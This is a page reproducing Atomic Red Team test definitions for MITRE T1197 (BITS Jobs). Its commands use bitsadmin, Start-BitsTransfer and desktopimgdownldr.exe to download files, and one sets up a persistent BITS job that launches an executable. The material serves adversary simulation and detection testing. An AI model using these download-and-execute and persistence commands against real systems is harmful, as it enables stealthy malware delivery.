(SIGMA) SIGMA_lolbins
Created the . Updated 1 year, 10 months ago.
attack_technique: T1197
display_name: BITS Jobs
atomic_tests:
- name: Bitsadmin Download (cmd)
auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421
description: |
This test simulates an adversary leveraging bitsadmin.exe to download
and execute a payload
supported_platforms:
- windows
input_arguments:
remote_file:
description: Remote file to download
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
local_file:
description: Local file path to save downloaded file
type: path
default: '%temp%\bitsadmin1_flag.ps1'
executor:
command: |
bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}
cleanup_command: |
del #{local_file} >nul 2>&1
name: command_prompt
- name: Bitsadmin Download (PowerShell)
auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc
description: |
This test simulates an adversary leveraging bitsadmin.exe to download
and execute a payload leveraging PowerShell
Upon execution you will find a github markdown file downloaded to the Temp directory
supported_platforms:
- windows
input_arguments:
remote_file:
description: Remote file to download
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
local_file:
description: Local file path to save downloaded file
type: path
default: $env:TEMP\bitsadmin2_flag.ps1
executor:
command: |
Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}
cleanup_command: |
Remove-Item #{local_file} -ErrorAction Ignore
name: powershell
- name: Persist, Download, & Execute
auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae
description: |
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps.
Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable.
This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS"
This job will remain in the BITS queue until complete or for up to 90 days by default if not removed.
supported_platforms:
- windows
input_arguments:
command_path:
description: Path of command to execute
type: path
default: C:\Windows\system32\notepad.exe
bits_job_name:
description: Name of BITS job
type: string
default: AtomicBITS
local_file:
description: Local file path to save downloaded file
type: path
default: '%temp%\bitsadmin3_flag.ps1'
remote_file:
description: Remote file to download
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
executor:
command: |
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
bitsadmin.exe /resume #{bits_job_name}
timeout 5
bitsadmin.exe /complete #{bits_job_name}
cleanup_command: |
del #{local_file} >nul 2>&1
name: command_prompt
- name: Bits download using destktopimgdownldr.exe (cmd)
auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
description: |
This test simulates using destopimgdwnldr.exe to download a malicious file
instead of a desktop or lockscreen background img. The process that actually makes
the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”)
and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
supported_platforms:
- windows
input_arguments:
remote_file:
description: Remote file to download
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
download_path:
description: Local file path to save downloaded file
type: path
default: 'SYSTEMROOT=C:\Windows\Temp'
cleanup_path:
description: path to delete file as part of cleanup_command
type: path
default: C:\Windows\Temp\Personalization\LockScreenImage
cleanup_file:
description: file to remove as part of cleanup_command
type: string
default: "*.md"
executor:
command: |
set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr
cleanup_command: |
del #{cleanup_path}\#{cleanup_file} >null 2>&1
name: command_prompt
Associated Techniques
No associated technique found so far.